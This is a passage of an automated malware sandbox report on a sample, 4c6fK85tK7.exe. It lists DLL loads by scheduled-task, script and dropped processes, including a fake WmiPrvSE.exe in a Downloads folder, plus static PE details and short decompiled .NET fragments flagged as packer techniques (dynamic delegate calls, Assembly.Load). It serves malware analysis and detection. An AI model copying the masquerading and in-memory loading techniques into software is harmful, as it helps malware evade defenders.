            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: mscoree.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: apphelp.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: version.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: uxtheme.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: windows.storage.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: wldp.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: profapi.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: cryptsp.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: rsaenh.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: cryptbase.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: sspicli.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: mscoree.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: version.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: uxtheme.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: windows.storage.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: wldp.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: profapi.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: cryptsp.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: rsaenh.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: cryptbase.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: mscoree.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: version.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: uxtheme.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: windows.storage.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: wldp.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: profapi.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: cryptsp.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: rsaenh.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: cryptbase.dll
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: mscoree.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: version.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: uxtheme.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: windows.storage.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: wldp.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: profapi.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: cryptsp.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: rsaenh.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: cryptbase.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: sspicli.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: amsi.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: userenv.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: edputil.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: iphlpapi.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: dnsapi.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: dhcpcsvc.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: winnsi.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: propsys.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: rasapi32.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: rasman.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: rtutils.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: mswsock.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: winhttp.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: urlmon.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: iertutil.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: srvcli.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: netutils.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: policymanager.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: msvcp110_win.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: wintypes.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: appresolver.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: bcp47langs.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: slc.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: sppc.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: rasadhlp.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: mscoree.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: version.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: uxtheme.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: windows.storage.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: wldp.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: profapi.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: cryptsp.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: rsaenh.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: cryptbase.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: sspicli.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: amsi.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: userenv.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: edputil.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: iphlpapi.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: dnsapi.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: dhcpcsvc.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: winnsi.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: propsys.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: rasapi32.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: rasman.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: rtutils.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: mswsock.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: winhttp.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: rasadhlp.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: urlmon.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: iertutil.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: srvcli.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: netutils.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: policymanager.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: msvcp110_win.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: wintypes.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: appresolver.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: bcp47langs.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: slc.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: sppc.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
            Source: 4c6fK85tK7.exeStatic file information: File size 4329984 > 1048576
            Source: 4c6fK85tK7.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x41f000
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 4c6fK85tK7.exe
            Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll source: componentWininto.exe, 00000008.00000002.2235833728.000000001C9D0000.00000004.08000000.00040000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003309000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002D7C000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb source: componentWininto.exe, 00000008.00000002.2235833728.000000001C9D0000.00000004.08000000.00040000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003309000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002D7C000.00000004.00000800.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: 0.0.4c6fK85tK7.exe.4c4e7f.3.raw.unpack, T0HDoS2uxaHqMCw3CHm.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.4c6fK85tK7.exe.26e483f.0.raw.unpack, T0HDoS2uxaHqMCw3CHm.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 1.0. yberLoad.exe.4b2617.1.raw.unpack, T0HDoS2uxaHqMCw3CHm.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, T0HDoS2uxaHqMCw3CHm.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            .NET source code contains potential unpacker
            Source: 0.0.4c6fK85tK7.exe.4c4e7f.3.raw.unpack, iDeKWBLxRkPswfeBBqA.cs.Net Code: vDDRcfB6TF System.AppDomain.Load(byte[])
            Source: 0.0.4c6fK85tK7.exe.4c4e7f.3.raw.unpack, iDeKWBLxRkPswfeBBqA.cs.Net Code: vDDRcfB6TF System.Reflection.Assembly.Load(byte[])
            Source: 0.0.4c6fK85tK7.exe.4c4e7f.3.raw.unpack, iDeKWBLxRkPswfeBBqA.cs.Net Code: vDDRcfB6TF
            Source: 0.3.4c6fK85tK7.exe.26e483f.0.raw.unpack, iDeKWBLxRkPswfeBBqA.cs.Net Code: vDDRcfB6TF System.AppDomain.Load(byte[])
            Source: 0.3.4c6fK85tK7.exe.26e483f.0.raw.unpack, iDeKWBLxRkPswfeBBqA.cs.Net Code: vDDRcfB6TF System.Reflection.Assembly.Load(byte[])
            Source: 0.3.4c6fK85tK7.exe.26e483f.0.raw.unpack, iDeKWBLxRkPswfeBBqA.cs.Net Code: vDDRcfB6TF
